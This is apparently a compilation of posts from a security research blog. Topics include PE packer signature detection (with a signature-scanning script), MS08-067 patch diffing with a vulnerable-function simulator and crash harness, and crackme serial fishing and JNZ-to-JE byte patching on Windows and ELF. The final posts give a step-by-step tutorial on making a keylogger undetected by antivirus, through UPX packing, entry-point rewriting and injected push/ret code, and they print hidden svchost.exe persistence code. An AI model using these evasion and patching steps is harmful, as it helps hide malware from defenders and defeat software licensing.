Abysssec Security Researches

hello to you all

i,m really sorry for our late  in posting we really working on lots of things … before starting about our subject i should  tell you about our advisories and exploits we are not  really full-disclosure believers but still we will post some more exploits and advisories at  :

http://www.exploit-db.com/author/abysssec

so stay tuned.

OK let’s start  ….

=========================================

before start if you are not familiar with PE  : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. The term “portable” refers to the format’s versatility in numerous environments of operating system software architecture.

for more information  :  http://en.wikipedia.org/wiki/Portable_Executable

- now the first question is what is a signature ?

a signature actually  is what that means but in computer world and more specific in reverse engineering and binary auditing  world a signature is a sequence of  unique instructions (actually their representation op-codes) in target binary.

for better understanding please watch figure 1

figure 1 – a c++ compiled binary opened in immunity debugger

reminiscence : an opcode (operation code) is the portion of a machine language instruction that specifies the operation to be performed.

in above figure it have tree red rectangular :

• first rectangular are RVA (relative virtual address) of instructions
• second rectangular are OP-Codes (will be execute)
• third rectangular are  readable assembly instructions

so we will search for a sequence of unique op-codes (so sequence of instructions)  in our target binary and those byte will be signature of our binary. simple enough eh ?

- what and who need to use a signature ?

• most of anti-virus (and other anti-things)
• and almost all of PE Detection tools

so now you can imagine how  an anti-virus company can detect a malware and how  PE-Detection tools  (witch areused for detecting signature in compiled binary and determine compiler / packer / compressor and … )  works .

- next question is why we need care about signatures:

• before starting any fuzzing / reversing / auditing project we need to about our target binary
• identify binaries those have not any signatures
• with them we can speed up our reversing and we can find available tools against our target binary

-how we can find signatures in binaries ?

we should search for static and constant location (static instructions) in our file but how we can find them? for answer to this question please watch PE file layout again :

figure 2 – PE file layout

we can search for signatures in a few areas :

• around program entry point (where program instructions will start execution …)
• from offset (from top to bottom)

each executable file have some other locations can be good for generating signature those are :

• around import table (where functions will be import)
• start and end of sections (optional section specially)
• name of optional / static sections
• ….

so we can just open the executable  under debugger and copy a few OP-Codes from entry point and we are done ? of course not ! because in lots of situations entry point could be change  refer to various factors like :

• initializing addresses / variables with state of program
• if we are in fighting against a packer / compressor / cryptor / there are several technologies they can use for hiding / changing instructions …

note : these changes are more on not “just compiled binaries” it means those have a packer / protector and ….

so how we can find reliable signatures ?

we need to research about variant program situations  and then we can understand which bytes/instructions are constant and which are not then we  can ignore dynamic bytes and rely to static bytes.

before a  real case study i just want explain how packer/protectors works :

a packer will do what it sounds : packing a program. think  about winzip it will comperes the program and actually will decrease size of program .

elementary packers just will compress the portable executable and will change entry point to decompression section for better understanding just watch below figure.

figure 3 How typical packer runtime works

1. Original data is located somewhere in the packer code data section
2. Original data is uncompressed to the originally linked location
3. Control is transferred to original code entry point (OEP)

Ok now you know how a basic packer works but today modern packers are not just compressor they will use a lots of anti-debugging  technologies against debugger / disassembler to make reverser life harder. this technologies are out of scope of  this post.

Ok for example if we want to make  a signature for a new packer / protector we need to pack / protect variant  executable (it’s better  to test on different compiler / size)  and then watch which byte of files are changed and which one are static !

you can use binary copy option in immunity debugger for starting our test

figure 4 binary copy

this program is  packed with a really simple and good packer named FSG.

and my first signature will be :

87 25 5C AD 41 00 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33

so now i need to pack more files and check my selected Op-codes to know which one are changed and then we will replace changed op codes with ?? .  after a few try we will get a signature like  :

87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33

so if i search for these bytes i can find i can find them in any program those are packed with FSG v2 !

this example is really really simple for advanced packer we need really test more bytes to be sure our signature is good enough but from my experience  length between 30-70 byte  from entry point are good enough.

if you be smart you will select good instructions like sections those have 16-bit registers and instructions those are not used all times. so an example of really good signature can be below figure (taken from symantec slides) :

figure 5 ( a really good signature )

OK. now you can make you own signatures just by spending a few time on each target . there are several tools can be use for detecting  signatures if executable most popular of them are :

• PEiD
• RDG Packer Detector
• PE Detective

but all of them have a same problem not so update signatures ! so if you have a program that is packed by a really new packer or just a few byte take changed from their signature  most of them will fail (intelligent signature detection is out of scope of this post) . so what we can do ? we should have our own database for our job .

so i collect all of existing signature database (those i found) in internet and i removed stupid and duplicated signature from the list those are :

• BoB at Team PEiD signature database
• Panda Security customized signature database
• Diablo2002 signature database
• ARteam members signature database
• SnD members signature database
• Fly signature database
• and …

after i combined all of their signature databases i changed a few of important signature to be more general and i added some new signature to my list  and my final list right now have around 5064 unique and 4268 from entry point signature.

PEiD can parse external signatures and it’s nice but i liked to have detection in my debugger so i searched for a signature detection library in python (i like python) and with a quick search i found nice Pefile coded by Ero Carrera can handle all of our requirement in working with PE file not only handling signatures you can download it at :

http://code.google.com/p/pefile/

so i decide to use this library to write a pycommand for immunity debugger fortunately i found a copy of a pefile in immunity debugger lib ! so all i have to do is writing a few line of code that can read my database and test it against my binary and tell me the output .
so here is my complete script also have a option for auto-update  .

#!/usr/bin/env python
 
'''
 This script is for identify packer/protector and compiler used in your target binary
 the first version have more than about 5000 signatures ... we will try to updates signatures monthly
 and for now it will use entry point scaning method ...
 
 Tree Important Notes :
 First  the database signatures are reaped by lots of people we should thanks them : BoBSoft at Team PEID  , fly , diablo2oo2 and others you can find their name in list ...
 Second A big thanks to Ero Carrera for his nice python pefile lib the hard part of processing singanutes is done by his library .
 Third  we updated some of signatures and will keep update them monthly  for detection newer version of packers / comprassion algorithm (hopefully) 
 
 thanks to nicolas waisman / Muts (offsec) and all of abysssec memebers ...
 
 Feel free to contact me with admin [at] abysssec.com
'''
 
#import python libraries
import os
import sys
import getopt
import pefile
import immlib
import peutils
import hashlib
import shutil
import urllib
 
__VERSION__ = '0.2'
 
DESC= "Immunity PyCommand PeDectect will help you to identfy packer / protection used in target binary"
USAGE = "!PeDetect"
 
#global
downloaded = 0
 
#Using debugger functionality
imm = immlib.Debugger()
 
# pedram's urllib_hook
def urllib_hook (idx, slice, total):
    global downloaded
 
    downloaded += slice
 
    completed = int(float(downloaded) / float(total) * 100)
 
    if completed > 100:
        completed = 100
 
    imm.Log("   [+] Downloading new signatures ... %d%%" % completed)
 
# Downloader function
def get_it (url, file_name):
    global downloaded
 
    downloaded = 0
    u = urllib.urlretrieve(url, reporthook=urllib_hook)
    #imm.Log("")
    shutil.move(u[0], file_name)
 
# Calculate MD5Checksum for specific file
def md5checksum(fileName, excludeLine="", includeLine=""):
    m = hashlib.md5()
    try:
        fd = open(fileName,"rb")
    except IOError:
        imm.Log("Unable to open the file in readmode:", filename)
        return
    content = fd.readlines()
    fd.close()
    for eachLine in content:
        if excludeLine and eachLine.startswith(excludeLine):
            continue
        m.update(eachLine)
    m.update(includeLine)
    return m.hexdigest()
 
# Simple Usage Function
def usage(imm):
    imm.Log("!PeDetect -u (for updating signature ... )" )
 
# Auto-Update function
def update():
 
    # Using urlretrieve won't overwrite anything
    try:
        download = urllib.urlretrieve('http://abysssec.com/AbyssDB/Database.TXT')
    except Exception , problem:
        imm.Log ("Error : %s"% problem)
 
    # Computation MD5 cheksum for both existing and our current database
    AbyssDB = md5checksum(download[0])
    ExistDB = md5checksum('Data/Database.TXT')
 
    imm.Log(" [!] Checking for updates ..." , focus=1, highlight=1)
    imm.Log("")
    imm.Log(" [*] Our  database checksum : %s "%AbyssDB)
    imm.Log(" [*] Your database checksum : %s "%ExistDB)
    imm.Log("")
 
    if AbyssDB != ExistDB:
 
        imm.Log("[!] Some update founds updating ....")        
 
        # Removing existing one for be sure ...
        if os.path.exists('Data/Database.txt'):
            os.remove('Data/Database.txt')
 
        # Download latest database
        try:
            get_it("http://abysssec.com/AbyssDB/Database.TXT", "Data/Database.txt")
        except Exception,mgs:
            return " [-] Problem in downloading new database ..." % mgs
 
        imm.log("   [+] Update Comepelete !")
 
    else:
        imm.Log(" [!] You have our latest database ...")
 
# Main Fuction
def main(args):
 
    if args:
        if args[0].lower() == '-u':
            update()
        else:
            imm.Log("[-] Bad argumant use -u for update ...")
            return  "[-] Bad argumant use -u for update ..."
    else:
        try:
            # Getting loded exe path
            path = imm.getModule(imm.getDebuggedName()).getPath()
        except Exception, msg:
            return "Error: %s" % msg
 
        # Debugged Name
        name = imm.getDebuggedName()
 
        # Loading loaded pe !
        pe = pefile.PE(path)
 
        # Loading signatures Database
        signatures = peutils.SignatureDatabase('Data/Database.TXT')
 
        # Mach the signature using scaning entry point only !
        matched = signatures.match(pe , ep_only=True)        
 
        imm.Log("===================  WwW.Abysssec.com  =======================")
        imm.Log("")
        imm.Log("[*] PeDetect By Shahin Ramezany" , focus=1, highlight=2)
        #imm.Log("=============================================================")
        imm.Log("[*] Total loaded  signatures : %d" % (signatures.signature_count_eponly_true + signatures.signature_count_eponly_false + signatures.signature_count_section_start))
        imm.Log("[*] Total ep_only signatures : %d" % signatures.signature_count_eponly_true)
        #imm.Log("=============================================================")
        imm.Log("")
 
        # Signature found or not found !
        if matched:
            imm.log("[*] Processing : %s " % name)
            imm.Log("[+] Signature Found  : %s "   % matched , focus=1, highlight=1)
            imm.Log("")
        else:
            imm.log("[*] Processing   %s !" % name)
            imm.Log("   [-] Signatue Not Found !" , focus=1, highlight=1)
            imm.Log("")
 
    # Checking for arguements !
        if not args:
            usage(imm)
 
        return "[+] See log window (Alt-L) for output / result ..."

for using this script you just need copy PeDetect.py in you PyCommand directory in immunity debugger python then copy Database.TXT in DATA folder in immunity debugger. after this you just need run it from immunity debugger command bar using !PeDetect you can see the output of this script against some files…

figure 6 – output of PeDetect against not packed file

figure 7 – output against  packed file

also this have an argument !PeDetect -u for updating your signature to our latest database. notice that my script will use md5checksum so your changes meaning it won’t be same as my database and your database will be update automatically.

figure 8 – update command

PS : after i wrote this i saw another PyCommand named scanpe wrote by BoB at PeiD it’s really good and have PE scan option but have not update update so no more new signatures …

references :

• Automatic Generation of String Signatures for Malware Detection
• Signature Generation by korupt (http://korupt.co.uk)
• Team PEiD forums
• Immunity Debugger online documentation
• FSecure – reverse engineering slides
• My time

download PeDetect (database + pycommand) from : (please read the ReadMe.txt for installation guide)

http://www.abysssec.com/files/PeDetect.zip

happy new years !

cheers

Hello

i know , i know i have a big absence about 2 month . but i,m back with a big update for you .

a step by step article about exploiting format string vulnerabilities on windows platform.

here is download link for this article :

http://abysssec.com/blog/wp-content/uploads/2009/02/fstring-exploit.pdf

feel free to send your questions to admin@abysssec.com|NoSpam

Good Luck and Have Fun !

hello to all our readers

In the past time of cracking many of the programs include the serial routine in the main EXE and u with the name of the cracker, able to find the routine and the valid serial in the main PE

But some of the big and pros team include the serial routine in the dll beside the main exe
And u with the name of cracker can fish and find the serial’s in the dlls of the products

In this new generation of software development this point change to the habit and many product use the dlls to check the serial ( online check or etc .., )  or make the serial ( serial Function … )

The nice friend from SND makes the little serial ME to guide the crackers how to fishing the serial from dlls and here the MrXX will teach the noob crackers

Get the serialME

Ok execute the exe and enter this information
NAME: MrXX
Serial: 123
“Invalid information, Please try again” what the ————– :(

Ok fire up the olly and load the target, run the target [F9] and in the main olly open the View > Executable modules and take look at the executed m
You will see the Prog.dll is in the use ok DClick to load the dll in olly

Oki daki the dll loaded into olly, in the CPU view right click under the Search for > All intermodular Calls
Scroll done, remember when u wrote the wrong serial the PE popup the Message box ok

DClick on the MessageBoxA and u going to the refer of message box
Do nothing

There is nothing interesting, not good??

Make olly minimize and u able to see the serialME, input the wrong name and serial again , the message box popup again click on the ok and back to olly

O some line was append, I think those are interesting :) , u can see the wrong serial 123 and right serial beside each other

right click on the serial in olly under copy > to clipboard and paste the code into serialME

and see the right message

that’s it , u fish the serial

see the source of serialME

and the author write his own keygen

see the source of keygen

u need the RadASM to use the source

lets going to the next step

I really enjoy to make the PE work with my serial

In the world of cracking we call this byte patching

Ok lets patch the EXE

Load the dll again into olly like as I say in up

Going to the message lines

And look carefully you will see 1 old friend into the strange PE

That’s right

JNZ

very easy , change the JNZ to JE and u able to register the PE with any serial that u like

I hope u will enjoy it , wait for more

And excuse us for our limit time

MrXX

hello again to all our patient readers

it’s been a long time since we wrote our last post’s ?! first of all i should say sorry for late in blog updates but the first reason is  we are really busy in these days with accomplish our projects . the second reason was changing our server . and finally the third reason is starting abysssec inc with a professional team for accomplish new projects and services . in soon future we have lots of good news may that’s interest you . so please be patient to see our news on our new index (that come soon as soon possible)

===================================================================

today i wanna talk about Microsoft security patch’s analysis  . as you know this year and specially last month’s of this year was a nightmare for M$ windows because we saw MS08-067 – MS08-068 – MS08-006 and MS08-001 and etc . and as you know too publishing real and working exploits is going to die and just you can see commercial exploits on time .

i saw this picture in one of Mr Nicolas Waisman  presentation and i believe to mind of this picture :

my goal from this introduction is if you want an exploit on publishing time you just have two chose :

1- write your own exploit

2- buy commercial exploit for your requirement vulnerability

- if you are a super millionaire you can buy all commercial exploits from variant security research teams and we are one of them ;)

- and if you are not you and you like and you need an exploit on time you should write your own exploit . and writing exploit for modern operation system’s is not easy because you need bypass a dozen of memory protections (such as DEP / ASLR / SAFSEH / Safe unlinking   and etc …  (from OS to commercial target software) also i believe this Mr Dave Aitel sentence : Not only are bugs expensive but the techniques for reliably exploiting bugs becomes expensive .

anyway becoming a real exploit coder is not easy but it’s possible and i should quote and notice another sentence that is : Modern Exploits – Do You Still Need To Learn Assembly Language (ASM) ( you can read full post here : (http://www.darknet.org.uk/2008/09/modern-exploits-do-you-still-need-to-learn-assembly-language-asm/)

i,m fully sure learning assembly language will help you in all of exploit development levels from reversing and understanding vulnerability to writing reliable exploit code for modern operation system’s .

after you can understand assembly code you can supposition high level code and thereupon you can identify vulnerability from discrepancy between patched and unpatched binaries (however advanced tools and IDA plugin’s make your life easier and you can identify vulnerable code / function if a few minutes)  this technic is called binary diffing. in future i,ll discuss a few advanced trick and methods , that’s improve your speed and analysis but for now i just talk about main of binary diffing on Microsoft security patch’s .

first step is downloading patch from Microsoft . the best way is searching on Microsoft site for your target bulletin . for example see MS08-067 (my favorite bug in this year :D )

just you need click on your target os and download the path.

after you downloaded the patch as you know you should not install the patch and you need extract patch data

with /x command .for example extracting ms08-067 patch :

the output of executing atop command is extract all date inside the patch . and in this example result is :

as you can see in this patch we have just one file and that is a dll named netapi32.dll so we can understand vulnerable function is in this dll .

next step is find vulnerable (unpatched) file (or files) on your system and then you can rename patched file to filename_patched.XXX and then you can analysis and notice changes in patched and unpatched files.

for accomplish this procedure you can use different tools and ways . but using IDA Pro is one of best and logical ways you can use for this procedure . you can understand changes without any plugins and auxiliary tools but for imporving speed and getting better result you have tree choice .

1- using bindiff (exclusive commercial IDA plugin and best auxiliary too analysis

for example you can see patch analysis video for MS08-001 (TCP/IP Kernel Pool Overflow)  here :

http://www.zynamics.com/files/ms08001.swf

2- using Eeye DiffingSuite  i like this tools because it’s really easy to use and effective .

you can download this tools from following link :

http://research.eeye.com/html/Tools/download/DiffingSuiteSetup.exe

and also you see tree good video about analysis different patched with this tools

- analysing MS06-033 : http://research.eeye.com/html/tools/tutorials/BDS_v_MS06-033.htm

- analysing MS06-007 : http://research.eeye.com/html/tools/tutorials/MS06-007.htm

- analysing MS06-036 : http://research.eeye.com/html/tools/tutorials/MS06-036%20Analysis.htm

after videos please read following link (a good work from Mr stephen lawler) about full reverse of MS08-067 patch using DiffingSuite and IDA pro cheerfully because it contain divisor of work :

http://www.dontstuffbeansupyournose.com/?p=35

3- using tenable security PatchDiff . PatchDiff is another IDA Pro Plugin (like bindiff) but have a big difference with Bindiff this plugin is free !

you can see a video about this plugin here :

http://cgi.tenablesecurity.com/tenable/pdiff2.swf.html

and you can download this plugin from following link :

http://cgi.tenablesecurity.com/tenable/dl.php?p=patchdiff2-2.0.5.zip

using this plugin is so easy but i discuss a few about this plugin  . frist of all you need patched and unpatched binaries after this you just first need open unpatched binary IDA and save disassembly in idb file after that you should open patched binary and save disassembly result to another idb file :

since  this you just need open unpatched IDB using plugin to understating discrepancy . after this step as Mr Nicolas Pouvesle (pathdiff plugin author) discussed graph nodes can be synchronized by double clicking on a given node. Graphs use the following colors:

• white: identical nodes
• grey: unmatched nodes
• red: matched nodes
• tan: identical nodes (different crc)

for example you see patchdiff result for MS08-067 patch :

and :

if you be smart you can write a high level simulator code for vulnerable function . for example Mr Alexander Sotirov wrote a simulator of vulnerable function :


#include

// This is the decompiled function sub_5B86A51B in netapi32.dll on XP SP3
// and sub_6EA11D4D on Vista SP1

int ms08_067(wchar_t* path)
{
wchar_t* p;
wchar_t* q;
wchar_t* previous_slash = NULL;
wchar_t* current_slash = NULL;
wchar_t ch;

#ifdef VISTA
int len = wcslen(path);
wchar_t* end_of_path = path + len;
#endif

// If the path starts with a server name, skip it

if ((path[0] == L’\\’ || path[0] == L’/') &&
(path[1] == L’\\’ || path[1] == L’/'))
{
p = path+2;

while (*p != L’\\’ && *p != L’/') {
if (*p == L’\0′)
return 0;
p++;
}

p++;

// make path point after the server name

path = p;

// make sure the server name is followed by a single slash

if (path[0] == L’\\’ || path[0] == L’/')
return 0;
}

if (path[0] == L’\0′) // return if the path is empty
return 1;

// Iterate through the path and canonicalize ..\ and .\

p = path;

while (1) {
if (*p == L’\\’) {
// we have a slash

if (current_slash == p-1) // don’t allow consequtive slashes
return 0;

// store the locations of the current and previous slashes

previous_slash = current_slash;
current_slash = p;
}
else if (*p == L’.’ && (current_slash == p-1 || p == path)) {
// we have \. or ^.

if (p[1] == L’.’ && (p[2] == L’\\’ || p[2] == L’\0′)) {
// we have a \..\, \..$, ^..\ or ^..$ sequence

if (previous_slash == NULL)
return 0;

// example: aaa\bbb\..\ccc
// ^ ^ ^
// | | &p[2]
// | |
// | current_slash
// |
// previous_slash

ch = p[2];

#ifdef VISTA
if (previous_slash >= end_of_path)
return 0;

wcscpy_s(previous_slash, (end_of_path-previous_slash)/2, p+2);
#else // XP
wcscpy(previous_slash, &p[2]);
#endif

if (ch == L’\0′)
return 1;

current_slash = previous_slash;
p = previous_slash;

// find the slash before p

// BUG: if previous_slash points to the beginning of the
// string, we’ll go beyond the start of the buffer
//
// example string: \a\..\

q = p-1;

while (*q != L’\\’ && q != path)
q–;

if (*p == L’\\’)
previous_slash = q;
else
previous_slash = NULL;
}
else if (p[1] == L’\\’) {
// we have \.\ or ^.\

#ifdef VISTA
if (current_slash != NULL) {
if (current_slash >= end_of_path)
return 0;
wcscpy_s(current_slash, (end_of_path-current_slash)/2, p+2);
goto end_of_loop;
}
else { // current_slash == NULL
if (p >= end_of_path)
return 0;
wcscpy_s(p, (end_of_path-p)/2, p+2);
goto end_of_loop;
}
#else // XP
if (current_slash != NULL) {
wcscpy(current_slash, p+2);
goto end_of_loop;
}
else { // current_slash == NULL
wcscpy(p, p+2);
goto end_of_loop;
}
#endif
}
else if (p[1] != L’\0′) {
// we have \. or ^. followed by some other char

if (current_slash != NULL) {
p = current_slash;
}
*p = L’\0′;
return 1;
}
}

p++;

end_of_loop:
if (*p == L’\0′)
return 1;
}
}

// Run this program to simulate the MS08-067 vulnerability

int main()
{
return ms08_067(L”\\c\\..\\..\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAA”);
}

final steps are identify vulnerable function / understaning function parameters and write a POC code for controlling EIP .

for example Mr stephen lawler wrote a c program for checking MS08-067 vulnerability by taking the offset between sub_7CDDB23D and the load address of NETAPI32.DLL :


#include

#include

int wmain(int argc, wchar_t **argv)

{

HMODULE netapi32 = LoadLibraryW(argv[1]);

void (__stdcall *foo)(PWCHAR);

WCHAR buf[4096];

*(PVOID*)&foo = (PVOID)(((PUCHAR)netapi32) + 0×1b23d);

//__asm { int 3 }

wcscpy(buf, argv[2]);

foo(buf);

wprintf(L”%s\n”, buf);

}

and finnaly he got a crash :

after getting first crash you just need getting eip and write exploit for vulnerability .

finally i should say sorry for disheveled writing . the reason of this is size of this subject in next post i talk directly about patch analysis tricks and i,ll anlysis another interesting Microsoft Patch step by step .

thank you for your time and attention

best regards

shahin.r

Here we go , another tutorial about unpacking general lame packers

hope you enjoy

if you are interest you can download full tutorial from following link :

http://rapidshare.com/files/162093080/New.rar.html

good luck and have fun

hello again .

i think this post must be interesting for iranian peoples . this theme is completely ripped from my  friend soroush dalili weblog finally don’t forgot this post and algorithm was published for educational purposes only so author is not held responsible , used for any other purposes than the one stated above.

Melli card & code

Each person in Iran has a national code which is called “Code Melli”. And, its algorithm is very similar to ISBN algorithm:

The rules are:

1-  This number has 10 digits like: C[1] C[2] C[3] C[4] C[5] C[6] C[7] C[8] C[9] C[10]

2-  3 digits of left must not be equal to 000 (c[1]c[2]c[3]000)

3-  C[10] is a control digit (like ISBN algorithm)

The formula to determine C[10] is:

Let A = (C[1]*10)+ (C[2]*9)+ (C[3]*8)+ (C[4]*7)+ (C[5]*6)+ (C[6]*5)+ (C[7]*4)+ (C[8]*3)+ (C[9]*2)

Let B = A MOD 11

If B == 0 Then C[10]=B Else C[10] = 11-B

This JavaScript function is useful to validation:

//—————Start of Iranian national code checker function—————

True-False

//Written by Soroush Dalili – October 2008

//——————————————————————————————–

function IsIRNationalCode(theNum)

{

if(theNum.length!=10)

{

return false;

}

else

{

if(theNum.substr(0,3)==’000′) return false;

var check = 0;

for(var i=0;i

{

var num = theNum.substr(i,1);

check += num*(10-i)

}

if(check%11)

{

return false;

}

else

{

return true;

}

}

}

//—————End of Iranian national code checker function—————

True-False

//——————————————————————————————–

good luck and have fun

Again it’s me , MrXX
Like what I was to say in this post I going to talk about sample ELF Reversing

I don’t know how many people talk about this later but this tut was some of the strange & maybe new to learn ( I was see many of cracking team just working on the windows , because Linux is free , he but all the OS need some time’s to do some cracking )

All the words you will read is going from author : MrXX ( like pervious post )
Ok let’s started

First think we need some tools
We use these tools for making are way easier
1-Some Program for Crack
2-the GUI Debugger
3-Hex Editor
4-some knowledge about the ASM , Cracking

Ok the first think : Some PJ for Crack

Source Code

Complied Project

Cracked Pj

I was write sample Crack Me for this part
The crack me is open source : he he

#include<stdio.h>

int
main(){
int password=123456;
int inputpass;

printf(“Please Enter a Password to continue > “);
scanf(” %d”,&inputpass);

if ( inputpass == password ){
printf(“\nWelcome u will able to access the Tool\n”);
printf(“\n======================================\n”);
printf(“\nU able Reverse the linux elf file \n”);
printf(“\nKeep Good job    \n”);
printf(“\n======================================\n”);
}
else
{
printf(“\nBAD Password\n”);
}

return(0);
}

You will available to see in the code , we got the IF statement that was check to value
First the pass is = 123456 ok
If pass = user input show the good message or if not show the bad message
Ok I compile it before and executed and see the message
Please Enter a Password to continue > 123
I enter a wrong code and see the bad message

Bad Message

Know how can I able to see the Good message
Let’s start some reversing
2 – I need the GUI debugger ( why ? because many time I use the windows debugger like olly or ida and know I addict to use the gui )
Ok it isn’t problem ( but don’t be lazy like me , u must use the command line debugger like : many …. )
I going and get the  Zero Debugger from address
http://www.zero-bugs.com
( this is one of the Linux app need to be Cracked | and I release the path for this later )
I startup my Ubuntu Linux ( because I use the Ubuntu version of zero debugger )
And after I install Zero Debugger ( need some pack to be installed ) and run the debugger
From zero debugger I go under File > Execute menu and  open my ELF file and I see the disassemble face of the ELF

ZeroDebugger

I scroll done some line and see the CMP ( Compare ) and in the line under I see the JNZ statement , yeah look good ( 4-this is the way u need some knowledge about the ASM , Cracking )
I wrote done the line , 08048406 75 52   jnz 0x804845a
This is cool for the first Crack me , we don’t need to get to the line and see what’s inside , because the crack me is sample

3- know I need to edit the line and change the 75 52 hex to 74 52
Ok I start the hexedit program

HexEditing

And go to the 00000400 line , find the 406 hex code ( remember the 08048406 ) and change the 75 to 74
I save the file into crackme cracked and executed again
I enter a wrong code again and see , yeah the good message

Good Message

We able to Reverse the ELF file
This is it , all routine was sample
But don’t be happy , because when the code getting bigger you will got the bad problem ( why ? because there is no olly or ida or sample code to reverse )
And u must do with command line and many line of code

In the next step we going to crack be bigger crack me : called CrackMe2 using Function
Good luck

In the name of god
Hi, I’m MrXX and in this blog I want to talk about the some coding, reversing and more…

And please don’t post the some shit comment in the index, because we going to delete it
And please don’t spam us with Noob question, cause they don’t answer the Noob
And the last think sorry about the English, cause I can’t even talk in English (I just can read) by the way

In the first, I want to talk about some reversing (I tired and seek and my mind wasn’t work correctly)
This is not my tut by I search over the web 2 or 3 day to find the best way & I think this is best way (original tut by : Kenny)

To undetected the malware from antivirus

First we need tools
1-Hex editor: I use the HIEW (not the 32 bit ver)
2-PE Tools: I use the PE Tools v1.5
3-UPX
4-Cracker call this BRAIN (I think I got it by I can’t give it to u, go find yours) 
If u don’t know what is those tools and how u can use it: I tell u go f.u.c.k yourself and please don’t read this
Ok , I read the magic world and dorooooororooooooo : oh my god magic happen :) , my f.u.c.k.ing malware undetected , ha ha ha ha I’m kidding there is no magic & magic is just some shit , every think in this whole world have the logical reason (I don’t believe magic)
Make malware (Trojan,rootkit,virus,…) undetected just have some little ways and if u like it I tell all the possible way to make our malware tools undetected ,but I tell it 1 by 1 , and if I see some , kididi mididi tnx in the comment I tell the next magic world
Let’s pull the chair close to your PC and get started
I wrote my own keylogger many year ago , but god DAMN antivirus known my own private keylogger as the probably unknown NewHeur_PE virus

And nod want to submit this to them Database

Oh my god how could this happen :) , don’t worry about that I tell u next time how u can bypass the stupid antivirus with some cryptography
In this time I want to undetected the binary file (u can use this to make all the binary malware u don’t have them source)
See the virustotal result: that’s nasty

And u will see, some of antivirus detect the malware and some of them don’t detected because is this private
Malware detected because of some of the line like:

Dim ModuleName As String, FileName As String, hInst As Long
ModuleName = String$(128, Chr$(0))
hInst = GetWindowWord(Me.hwnd, GWW_HINSTANCE)
ModuleName = Left$(ModuleName, GetModuleFileName(hInst, ModuleName, Len(ModuleName)))

If CheckPath(SystemDir + “svchost.exe”) = False Then
FileCopy ModuleName, SystemDir + “svchost.exe”
ShellExecute Me.hwnd, “open”, SystemDir + “svchost.exe”, vbNullString, vbNullString, SW_HIDE
End
End If

Or
Because the uses of those api

Private Declare Function SetWindowsHookEx Lib “user32″ Alias “SetWindowsHookExA” (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib “user32″ (ByVal hHook As Long) As Long
And…

Ok later we crypt those command and use the API very cleverly to bypass the Noob antivirus
Oh we talk some much let’s back to the undetected part
First we pack the file with UPX (do something else) and we open our packed file with the PE Tools

Open file and get some info about the entrypoint

Entry Point: 0000AD20
Image Base: 00400000

Now we open the packed file with HIEW in the disassemble mode we going to entry point
U will see some entry like this

This is the entry that was UPX make
When we scroll done some line we will see zero space, we use this for hexing our tool
Place those codes into the zero space
Use the edit F3/F2 command

push        00040AD20   <— push OEP
push        eax
pushfd                   <—for tricking AVP
pushad                    <—for tricking AVP
call       .000025154  <—– call for Ret 28h
retn 00028

The address depend on your system and those are not the static

After that , save the progress
And again add 2 line

INC ECX  <— Counter up
Loop 000022D9

Save them again
Ok our hexing finish , now we must go and change our entry point to the new entry
We open the PE Tools again change the entry point to the new value

OEP = entry address – imagebase(400000)

New entry:0040AED9

After that we unpack the file with UPX an it must be undetected from AV
This method called: changing the entry point for undetected the malware
That’s the nice way but we got the easy way to like Pack the file , hexing the Signature of the file and  …

In the next post I talk about ElF File’s And Reversing
Good Luck
MrXX

yeah , as i say in the last post

in this tut you will learn to bypass some of the sutpid god DAMN antivirus with string Encrypt/Decrypt trick

DL Link

the next post will be : Undetect the malware from AV